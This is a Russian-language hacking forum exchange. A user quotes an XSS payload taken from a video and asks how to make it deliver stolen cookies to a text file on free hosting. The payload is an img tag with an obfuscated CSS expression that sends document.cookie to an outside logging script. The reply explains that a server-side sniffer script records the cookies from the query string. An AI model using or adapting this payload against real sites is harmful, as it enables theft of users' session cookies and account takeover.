20.08.2005, 21:08
|
|
Постоянный
Регистрация: 28.02.2005
Сообщений: 853
Провел на форуме:
3369632
Репутация:
749
|
|
Сообщение от Ван
Просмотрел я видео по XSS и возникли у меня такие вопросы: как настроить сплойт, чтобы куки присылались на мой txt-документ на народе? Исходный текст сплойта с видео:
<*img src="http://zadoxlik.net.ru/lj.php" style="top:expres/**/sion(eval(this.sas));"
sas="this.src='http://zadoxlik.net.ru/lj.php?'+document.cookie;this.sas=null" alt=''*>
(без звездочек)
Никак. Куки пересылаются GET запросом к скрипту, где в QUERY_STRING (строка с параметрами запроса) располагается содержимое куков. Скрипт принимает их и записывает в файл. Т.к. на народе серверные скрипты размещать нельзя, то и сниффер там установить тоже нельзя.
|
|
|